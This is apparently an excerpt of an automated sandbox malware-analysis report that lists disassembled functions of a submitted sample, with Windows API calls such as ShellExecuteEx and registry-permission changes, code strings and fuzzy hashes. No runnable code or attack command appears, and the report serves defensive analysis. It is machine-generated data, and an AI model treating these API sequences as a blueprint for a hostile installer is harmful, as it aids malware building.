                                                                          • Opcode ID: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
                                                                          • Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
                                                                          • Opcode Fuzzy Hash: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
                                                                          • Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F
                                                                          APIs
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                          • String ID: AllowSetForegroundWindow$user32.dll
                                                                          • API String ID: 1782028327-3855017861
                                                                          • Opcode ID: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                          • Instruction ID: 0cf89beef61ef8a76223fb5aa8394d6e95b25c45a6fd57a36df02fca6db0c00c
                                                                          • Opcode Fuzzy Hash: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                          • Instruction Fuzzy Hash: 79D0A9E0200F0169DD10B3F2AD47EAB329ECE84B10B92843B7408E3182CA3DE8404E3C
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: NotifyWinEvent$dD$user32.dll
                                                                          • API String ID: 1646373207-754903266
                                                                          • Opcode ID: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                          • Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
                                                                          • Opcode Fuzzy Hash: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                          • Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F
                                                                          APIs
                                                                          • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                          • SaveDC.GDI32(?), ref: 00416C93
                                                                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                          • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                          • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                          • String ID:
                                                                          • API String ID: 3808407030-0
                                                                          • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                          • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                          • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                          • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                          • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                          • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                          • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                          • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                          • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                          • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                          • Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                          • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                          • 73A0A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                          • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                          • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: MetricsSystem$A16310A570DeleteObject
                                                                          • String ID:
                                                                          • API String ID: 2246927583-0
                                                                          • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                          • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                          • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                          • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                          APIs
                                                                            • Part of subcall function 0045C76C: SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                          Strings
                                                                          • Could not set permissions on the registry key because it currently does not exist., xrefs: 004725F3
                                                                          • Setting permissions on registry key: %s\%s, xrefs: 004725AE
                                                                          • Failed to set permissions on registry key (%d)., xrefs: 00472610
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                          • API String ID: 1452528299-4018462623
                                                                          • Opcode ID: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                          • Instruction ID: 4334e49d385bf692f2cc32478bc4a2497c1f2fe716dd62bcd395c3eafaa3e5f2
                                                                          • Opcode Fuzzy Hash: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                          • Instruction Fuzzy Hash: 9C218370A046445FCB01DBAAD9827EEBBE4EB49314F50817BE408E7392D7B85D05CBA9
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 262959230-0
                                                                          • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                          • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                          • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                          • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                          APIs
                                                                          • 73A08830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                          • 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                          • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                          • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                          • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A022A08830$A480
                                                                          • String ID:
                                                                          • API String ID: 3036329673-0
                                                                          • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                          • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                          • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                          • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                          APIs
                                                                          • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                          • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                          • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$NameOpenResourceUniversal
                                                                          • String ID: Z
                                                                          • API String ID: 3604996873-1505515367
                                                                          • Opcode ID: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                          • Instruction ID: 2d8f00a968b5306eb49df96258ffff6df6a72a1db963417fd4edcb7bb2ad48f8
                                                                          • Opcode Fuzzy Hash: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                          • Instruction Fuzzy Hash: C1513070E04208ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE458F5A
                                                                          APIs
                                                                          • SetRectEmpty.USER32(?), ref: 0044C8A2
                                                                          • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
                                                                          • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DrawText$EmptyRect
                                                                          • String ID:
                                                                          • API String ID: 182455014-2867612384
                                                                          • Opcode ID: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                          • Instruction ID: 68feaf95479c8b0f8d19ac4d8bed049c81d0e9902cdc902b6301711e3864cdc7
                                                                          • Opcode Fuzzy Hash: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                          • Instruction Fuzzy Hash: 435152B0A01248AFDB50DFA5C885BDEBBF8FF49304F08447AE845EB251D7789944CB64
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12
                                                                            • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                          • SelectObject.GDI32(?,00000000), ref: 0042EE35
                                                                          • 73A0A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570CreateFontIndirectObjectSelect
                                                                          • String ID: ...\
                                                                          • API String ID: 2998766281-983595016
                                                                          • Opcode ID: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                          • Instruction ID: f7e46b9156472dd3d3dfb1d2a9ceb23c9820bf6754630174aa29599cfb354949
                                                                          • Opcode Fuzzy Hash: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                          • Instruction Fuzzy Hash: E0318170B00128ABDF11EF9AD841BAEB7B9EB48308F91447BF410A7291D7785D45CA69
                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                          • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                          • RegisterClassA.USER32(?), ref: 004164DE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Class$InfoRegisterUnregister
                                                                          • String ID: @
                                                                          • API String ID: 3749476976-2766056989
                                                                          • Opcode ID: 7b25cfcb3d4f9f28465275db2d67cdf9f267fbcc740a3ff75a925c386f358e46
                                                                          • Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
                                                                          • Opcode Fuzzy Hash: 7b25cfcb3d4f9f28465275db2d67cdf9f267fbcc740a3ff75a925c386f358e46
                                                                          • Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A
                                                                          APIs
                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00454848
                                                                          • GetLastError.KERNEL32(0000003C,00000000,00454891,?,?,?), ref: 00454859
                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryErrorExecuteLastShellSystem
                                                                          • String ID: <$SuG
                                                                          • API String ID: 893404051-1504269210
                                                                          • Opcode ID: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
                                                                          • Instruction ID: e58c708146c2f721f38e64faa2aac8e88425893723770a95bfdd45a03fe75b0c
                                                                          • Opcode Fuzzy Hash: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
                                                                          • Instruction Fuzzy Hash: 7D218574A00249ABDB10EF65C88269E7BE8EF49349F50403AF844EB381D7789D498B98
                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                          • ExitProcess.KERNEL32 ref: 00404E0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ExitMessageProcess
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1220098344-2970929446
                                                                          • Opcode ID: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                          • Instruction ID: 7c754c0b660761a5bc1c63aadfae0e1dd2c0c13e95eab211716155318e46cc07
                                                                          • Opcode Fuzzy Hash: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                          • Instruction Fuzzy Hash: E421CB606442514ADB11AB799C857163B9197E534CF04817BE700B73F2CA7D9C64C7EF
                                                                          APIs
                                                                            • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455E48
                                                                          • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455E75
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                          • String ID: LoadTypeLib$RegisterTypeLib
                                                                          • API String ID: 1312246647-2435364021
                                                                          • Opcode ID: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
